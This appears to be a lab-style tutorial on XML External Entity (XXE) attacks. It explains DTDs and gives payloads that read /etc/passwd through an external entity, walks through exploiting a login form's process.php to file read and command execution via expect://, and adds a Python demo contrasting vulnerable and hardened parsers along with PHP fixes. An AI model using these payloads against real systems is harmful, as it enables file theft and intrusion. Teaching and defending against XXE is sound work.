XML External Entity (XXE)

Introduction

An XML External Entity (XXE) attack is a vulnerability that abuses the external-entity feature of XML parsers. It typically allows an attacker to read files on the server that processes the XML and to interact with any backend or external systems the application itself can reach. Depending on the parser and the environment, it can also be used to cause a Denial of Service (DoS), to perform Server-Side Request Forgery (SSRF) by inducing the application to make requests to other systems, to port-scan internal hosts, and in some configurations to achieve remote code execution.


Types

There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).

1) In-band XXE

In an in-band attack the attacker receives an immediate response containing the result of the XXE payload, for example the contents of a file reflected in the HTTP response.

2) Out-of-band XXE (also called blind XXE)

In a blind attack the application's response does not contain the result of the payload, so the attacker has to exfiltrate it elsewhere: typically to a server they control (using external parameter entities that point at a DTD they host), or into another file or error message they can later read.


Document Type Definition (DTD)

A DTD defines the structure and the legal elements and attributes of an XML document.

```xml
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT from (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>
```

An XML document that conforms to this DTD:

```xml
<note>
  <to>falcon</to>
  <from>feast</from>
  <heading>hacking</heading>
  <body>XXE attack</body>
</note>
```


XXE Payloads

We define an ENTITY called name with the value feast and then reference it as &name; in the document body. The parser replaces the reference with the entity's value, so lastName is read as feast:

```xml
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
  <firstName>falcon</firstName>
  <lastName>&name;</lastName>
</userInfo>
```

If the parser resolves external entities, we can read a file from the server by declaring an entity with the SYSTEM keyword and a file:// URI. The file's contents are substituted wherever &read; appears:

```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
```

Manual Exploitation

  1. We start with a simple login application.

  2. Fill it with random data and examine the request in Burp.

  3. All of our data is being put into XML and POSTed to "process.php". Send the request and see what comes back.

  4. This is promising: the response returns the contents of one of the XML fields, which means we may be able to read files on the filesystem. Further playing with the request shows that it is the email field that gets reflected.

  5. Create an external entity whose value is the contents of /etc/passwd and reference it in the email field. PayloadsAllTheThings has ready-made payloads for this.

  6. We have XXE! This is typically as far as it goes: we can read files on the system and use them to enumerate further. There is, however, a chance of RCE if the PHP expect module is loaded. expect is a PHP extension that lets you run commands through the expect:// stream wrapper (for example expect://id).

  7. Fortunately for us, expect:// works here. This module is not installed by default, so someone has to have installed it deliberately; don't immediately go for RCE.
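The following is an added example, not code from the original page, that shows what the payload from the XXE Payloads section does inside a parser and what the hardened state looks like, modelled on the process.php login request in the walkthrough above. It uses Python's expat-based SAX reader, whose feature_external_ges flag toggles external general entity resolution (off by default since Python 3.7.1). The field names (name, tel, email, password) are assumptions, and a constructed temporary file stands in for /etc/passwd so the script runs offline:

```python
"""Added example: XXE file read vs. hardened parser, using xml.sax (expat).

Not the original page's code. The login request layout (name, tel, email,
password) is assumed; a constructed temporary file stands in for /etc/passwd.
"""
import io
import os
import tempfile
import xml.sax
import xml.sax.handler


class FieldCollector(xml.sax.handler.ContentHandler):
    """Collects the text of each element, the way the login app reads its fields."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        # Text substituted from an entity (including an external one) arrives here too.
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_request(xml_bytes, resolve_external):
    """Parse a process.php-style request.

    resolve_external=True mirrors a parser that resolves external general
    entities (the vulnerable state). False is the hardened state, and the
    default of Python's SAX reader since 3.7.1.
    """
    handler = FieldCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return {k: v.strip() for k, v in handler.fields.items()}


def build_login_xml(name, tel, email, password):
    """The benign request the login form sends (field names are assumed)."""
    return (
        f"<root><name>{name}</name><tel>{tel}</tel>"
        f"<email>{email}</email><password>{password}</password></root>"
    ).encode()


def build_xxe_payload(path):
    """Step 5 of the walkthrough: declare an external entity that points at a
    file and reference it in the field the application reflects (email)."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY read SYSTEM "file://{path}">]>\n'
        "<root><name>a</name><tel>1</tel><email>&read;</email>"
        "<password>b</password></root>"
    ).encode()


def demo():
    """Write a constructed stand-in for /etc/passwd, then parse the payload
    with the hardened parser and with the vulnerable one."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample line
        path = f.name
    try:
        payload = build_xxe_payload(path)
        return {
            "benign": parse_request(build_login_xml("falcon", "123", "f@x.io", "pw"), False),
            "hardened": parse_request(payload, resolve_external=False),   # email -> ''
            "vulnerable": parse_request(payload, resolve_external=True),  # email -> file contents
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for mode, fields in demo().items():
        print(f"{mode:10s} email -> {fields['email']!r}")
```

With resolution enabled, the text of the referenced file is delivered to the content handler exactly as if it had been typed into the email field, which is why the application reflects it. In PHP the equivalent vulnerable state is passing LIBXML_NOENT to simplexml_load_string or DOMDocument::loadXML; leaving that flag out (and, on PHP versions before 8.0, calling libxml_disable_entity_loader(true)) is the fix.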


Automatic Exploitation

XXE can't really be exploited automatically: the XML structure differs between applications, and you can't know in advance which payload will or won't work. By the time you have confirmed the vulnerability and written a script for it, you could already have file read or a reverse shell using Burp.

